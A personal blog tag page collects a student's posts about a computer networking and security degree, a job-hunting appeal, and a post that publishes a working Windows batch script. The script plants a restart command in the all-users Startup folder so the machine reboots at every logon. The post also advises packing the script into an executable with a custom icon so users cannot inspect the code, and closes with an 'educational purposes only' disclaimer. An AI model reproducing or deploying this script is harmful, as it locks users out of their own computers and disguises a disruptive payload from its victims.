All Posts Tagged Tag: ‘CNISS’

 

Computer Networking and Information Systems Security, Check!

As of the 22nd of March, 2011, I have graduated from Clover Park Technical College with an Associate Degree in Computer Networking and Information Systems Security.

To further educate myself, gain experience, and also make use of my spare time while searching for employment, I am continuing my internship in the Information Technology department on campus. I hope that one of the employers who have posted job openings, of which I have applied for, will contact me soon for an interview. The best positions I could hope for, would be Linux administration, Windows administration, entry-level database administration, and network administration.

As a side note, if you are reading this and work for, or manage an Information Technology company or department that is currently hiring for positions mentioned above, please contact me using the email address in my “About Me” page. I am immediately available for hire, and can work any day of the week. I would prefer morning, or evening hours, but will work graveyard hours on a temporary basis.

Here’s to hoping that this blog post pays off!

 

An Update on my Studies at Clover Park Technical College

I am about 3 months away from receiving my Associates Degree. I am in the last quarter of the Computer Networking and Information Systems Security Degree at Clover Park Technical College.

This program has been a blast, made better by my friends and the instructors. Kelly Hollowell, Donald Souza, Ray Robinson, and Jody Randall have given me a great education. Going into the program, I was fairly advanced in my knowledge of computers, but what I didn’t know is how much of a noob I really was. I have gained knowledge in operating systems such as Debian Linux, RedHat Linux, Windows Server 2003, and 2008. The instructors have enabled me to start a career in the Information Technology sector, through opportunities in class, and the internship with Cris-Jon Lindsay on campus.

I am extremely grateful for the education I have received through the Computer Networking and Information Systems Security Degree program, and internship, at Clover Park Technical College.

 

An Infinite Restart Script for Windows Operating Systems

In one of my classes at CPTC, we started to learn how to write Windows Batch Scripts. Myself and a few of my classmates almost got into trouble (not really though) a few weeks ago, by sending messages through the use of shutdown commands over the LAN. Last week, I started to think about how could I have the computer restart every time a user tries to log on to their computer. Finally, after shifting code around for a while, I came up with a reliable script to do what I wanted it to do.

Upon execution, this Windows Batch Script will create a file called “restart.bat” that includes the command to immediately restart the computer. This file is then moved to the Startup folder for all users. After the file is moved, the user that is currently logged in will be logged off. When the user attempts to log on to the computer again, the computer will restart. Now every time the user tries to log on to the computer, it will automatically restart.

This is a script that will annoy just about everyone. One change that I have come up with is to package the restart script into an executable, then package that executable into a second executable, which includes a script that is similar to what you see below. Now instead of running a script, you run an executable with your own icon. The result is exactly the same, but masking it behind an executable makes it so that the user cannot view the code.

To remove the restart script/executable from your Startup folder, you have to boot into Safe Mode. This can be done by pressing the F8 key on your keyboard, before the Windows loading bar screen appears. After you boot into Safe Mode, go to (Start > All Programs > Startup) and delete the file that is causing your computer to restart. If the script used is the one below, then you would delete restart.bat.

:: Windows OS Infinite Restart Script
:: This script will cause a Windows OS to immediately restart after logging in to a user account.
:: Created by Andrew R. DeFilippis on February 22, 2010
:: http://www.andrewdefilippis.com/

@ECHO OFF
:: Disable echo commands from printing on screen

ECHO ^@ECHO OFF > restart.bat
ECHO SHUTDOWN /r /t 0 >> restart.bat
ECHO EXIT >> restart.bat

VER | FIND “5.1″ > NUL
IF ERRORLEVEL 0 GOTO OLD
VER | FIND “5.2″ > NUL
IF ERRORLEVEL 0 GOTO OLD
:: Determine what OS version is being used

GOTO NEW
:: If OS version 5.1 or 5.2 is not found, then go to NEW

:OLD
MOVE “restart.bat” “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\restart.bat”
SHUTDOWN /l /f
EXIT
:: Inject the restart script into older Windows OS’s
:: Then log off the current user

:NEW
MOVE “restart.bat” “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\restart.bat”
SHUTDOWN /l /f
EXIT
:: Inject the restart script into newer Windows OS’s
:: Then log off the current user

This script is posted for educational purposes only.

I am NOT liable for the use and/or misuse of this script.

 

CPTC – First Quarter

My first quarter at Clover Park Technical College is going great. I am currently in the first classes of the year for Computer Networking and Information Systems Security, and they are interesting. I noticed that I know quite a bit about what we are learning this quarter from working with computers for a large chunk of my life. The classes have been on computer hardware and general security concepts.

I am looking forward to finishing these classes and obtaining an associates degree, so I can look for a decent paying job!